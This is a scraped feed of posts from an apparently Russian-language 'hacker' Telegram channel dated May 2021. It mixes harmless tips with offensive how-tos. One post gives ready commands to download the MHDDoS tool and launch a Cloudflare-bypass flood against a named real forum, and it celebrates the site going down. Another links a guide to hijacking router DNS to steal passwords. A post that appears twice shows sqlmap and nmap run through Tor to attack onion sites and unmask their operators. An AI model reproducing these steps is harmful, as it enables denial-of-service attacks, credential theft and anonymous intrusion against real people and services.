Size: a a a

ХАКЕРЫ. ハッカー

2021 May 08
ХАКЕРЫ. ハッカー
источник
ХАКЕРЫ. ハッカー
источник
ХАКЕРЫ. ハッカー
источник
ХАКЕРЫ. ハッカー
I2P – невидимый интернет

Сеть I2P является устойчивой, анонимной (невозможно или сложно определить IP-адрес) и децентрализованной (не имеющей центрального сервера). При передаче данных между узлами сети применяется шифрование.

Windowsскачать

MacOSскачать

Linuxскачать

Ubuntu/Debian

sudo apt-add-repository ppa:i2p-maintainers/i2p
sudo apt-get update
sudo apt-get install i2p

Androidскачать

Для использования I2P необходим Java Version 7/8. Проверить версию Java можно командой java - version в терминале.
источник
ХАКЕРЫ. ハッカー
​​[0] - Подмена DNS роутера

Писал статью про подмену DNS роутера, похищения паролей и подстановки своей рекламы, но получалось все это дело слишком громоздким. И решил я разделить на 3 части. А может будет и четвертая часть, где будем настраивать SSL для нашего фейка и пятая часть, где создадим свою админку где будем собирать структурировано наши плоды. Дополнительные скорее всего будет, если интерес ко всему этому.

Читать: https://codeby.net/threads/0-podmena-dns-routera.61691/

#dns #phishing
источник
ХАКЕРЫ. ハッカー
​​Cоздаем туннель для безопасной передачи файлов

Когда мы загружаем файл во всемирную паутину, мы автоматически даем доступ к нему различным сервисам, компаниям, людям. Если вы пользуетесь почтовыми сервисами для отправки важных файлов, то вы на самом деле довольно сильно рискуете, ведь если произойдет очередной слив, ваши файлы откажутся в открытом доступе.

WebWormHole — это сервис, которой создает туннель для отправки файлов. Файлы передаются с компьютера на компьютер без сторонней обработки данных.

Настройка

Чтобы наладить туннель, необходимо нажать кнопку New Wormhole — и получить код для входа. Человек с другой стороны введет такой же код или URL — и между вами установится эфемерный туннель, по которому напрямую передадутся файлы.

Безопасности пост ✌️
источник
2021 May 09
ХАКЕРЫ. ハッカー
​​Мутим DDoS атаку

Салам, бандиты. Сегодня я расскажу как сделать самую простую и эффективную DDOS атаку.

1. Переходим по ссылке и в данном окне прописываем несколько команд:
$ git clone https://github.com/MHProDev/MHDDoS.git
$ ls
$ cd MHDDoS
$ pip3 install icmplib requests pysocks cfscrape scapy
$ python3 start.py

2. Теперь мы видим все возможные методы DDoS'а. Что бы запустить DDoS прописываем:
$ python3 start.py CFB https://forumteam.best 1 1000 http.txt 1000 1000
$ CFB - ClaudFlareBypass

3. Наслаждаемся падением сайта;

Так просто ✌️
источник
ХАКЕРЫ. ハッカー
Бот для приёма SMS на разные сервисы

Перед вами качественный скрипт, написанный на питоне.

➖Инструкция:

Открываем конфиг, вставляем токен бота, меняем киви номер и api киви, после вставляем токен от смсхаба. Сохраняем и заливаем на хостинг. Готово ✌️
источник
ХАКЕРЫ. ハッカー
источник
ХАКЕРЫ. ハッカー
JCleaner - мощная, но безопасная программа для очистки реестра, мусорных файлов, списков истории, а также владеющая рядом дополнительных возможностей.

ОБ ЭТОЙ ВЕРСИИ
📁 Категория: #Система
🆚 Версия: v7.1.0.0
🖥 ОС: Windows
📀 Разрядность: x86/x64
🇷🇺 Язык интерфейса: Русский
🔑 Лечение: Не требуется
#️⃣ #JCleaner @portablik
источник
ХАКЕРЫ. ハッカー
#JCleaner @portablik
источник
ХАКЕРЫ. ハッカー
источник
ХАКЕРЫ. ハッカー
5 языков программирования для хакинга

📲
Читать | 💻Зеркало для пк
источник
ХАКЕРЫ. ハッカー
7 признаков, что вас взломали

Многие из вас любят сёрфить интернет в поисках прикольных ништячков, но грамотно следить за безопасностью своего аппаратного обеспечения удаётся только единицам. Поэтому, многие обыватели месяцами живут, подвергшись взлому и даже не подозревают об этом.

Признаки того, что вас взломали:

1. Антивирус выключен
- если антивирус по каким-то причинам решил выключиться сам или то включается, то выключается, без нашего вмешательства, то это явно указывает на то, что работать ему мешают какие-то вредоносные программы.
2. Изменение паролей в сети - если Вы не можете зайти на свою учётную запись, хоть и уверены в правильности данных, то Вас скорее всего взломали.
3. Рассылки с почты - если с Вашей почты проводятся необоснованные рассылки спама, то это явный признак взлома.
4. Левые программы - если Вы обнаружили, что на Вашем устройстве появляются программы, которые Вы никогда не устанавливали, то это явный признак взлома устройства.
5. Часто всплывают рекламные баннеры в браузере - если раньше у Вас всё было хорошо, а потом по какой-то причине каждый сеанс в браузере сопровождается тоннами рекламы, то это явный признак взлома.
6. Перенаправление интернет-запросов - если Вы стали замечать, что при переходе по нужному запросу Вас перекидывает на левые сайты, то это свидетельствует о взломе.
7. Замедление работы - если Ваше устройство внезапно начинает работать медленно, значит система явно нагружена чем-то не очень полезным и это свидетельствует о взломе.
источник
ХАКЕРЫ. ハッカー
источник
ХАКЕРЫ. ハッカー
Адаптируем инструменты под атаки на onion-сайты

Несмотря на свою скрытность и шифрование, сайты в сети Tor работают практически также как и в clearnet. Соответственно на них также могут присутствовать различные уязвимости, с помощью которых можно нарушить работу ресурса или деанонимизировать его создателя, к примеру. А если некоторые процессы проведения атак универсальны для обоих типов сайтов, то и некоторые популярные инструменты можно также адаптировать для работы в даркнете. Рассмотрим, для примера, как настроить sqlmap и nmap для работы в сети Tor.

Установка:
$
sudo apt instal tor nmap proxychains

Делаем sqlmap анонимной:
1. Для начала запускаем сам Tor:
$ tor

2. Теперь мы можем выполнять команды просто дописывая в конец: "--tor --tor-type=SOCKS5":
$ python2 sqlmap.py -u http://test.onion/index.php?id=2 --tor --tor-type=SOCKS5

Анонимизируем сканирование nmap:
Для анонимизации сканирования через nmap используйте дополнительную утилиту "ProxyChains":
$ apt install proxychains

По умолчанию proxychains уже настроен на работу с Tor, поэтому для начала стандартного сканирования нужно ввести команду:
$ proxychains nmap -sT -PN -n -sV -p 21 test2vy6foxjlzsh.onion

⚙️ Software | Buratinopol
источник
ХАКЕРЫ. ハッカー
​​​​Получаем пожизненную скидку на услуги сотовой связи

А)
Приходите в любой салон связи - конкурентов вашего оператора
Б) Оформляете процедуру перехода на другого оператора с сохранением вашего мобильного номера (она бесплатная), которая длится 2 недели
В) Вам обязательно позвонит ваш оператор и предложит вам условия, для того чтобы вы не ушли от них
Г) Жалуетесь ему на условия связи и говорите, что не согласны ни на что кроме как 50%  ( С вероятностью 90% вы его получите, если нет, то сойдётесь на 30)
источник
2021 May 11
ХАКЕРЫ. ハッカー
источник
ХАКЕРЫ. ハッカー
источник
ХАКЕРЫ. ハッカー
Адаптируем инструменты под атаки на onion-сайты

Несмотря на свою скрытность и шифрование, сайты в сети Tor работают практически также как и в clearnet. Соответственно на них также могут присутствовать различные уязвимости, с помощью которых можно нарушить работу ресурса или деанонимизировать его создателя, к примеру. А если некоторые процессы проведения атак универсальны для обоих типов сайтов, то и некоторые популярные инструменты можно также адаптировать для работы в даркнете. Рассмотрим, для примера, как настроить sqlmap и nmap для работы в сети Tor.

Установка:
$
sudo apt instal tor nmap proxychains

Делаем sqlmap анонимной:
1. Для начала запускаем сам Tor:
$ tor

2. Теперь мы можем выполнять команды просто дописывая в конец: "--tor --tor-type=SOCKS5":
$ python2 sqlmap.py -u http://test.onion/index.php?id=2 --tor --tor-type=SOCKS5

Анонимизируем сканирование nmap:
Для анонимизации сканирования через nmap используйте дополнительную утилиту "ProxyChains":
$ apt install proxychains

По умолчанию proxychains уже настроен на работу с Tor, поэтому для начала стандартного сканирования нужно ввести команду:
$ proxychains nmap -sT -PN -n -sV -p 21 test2vy6foxjlzsh.onion

⚙️ Software | Buratinopol
источник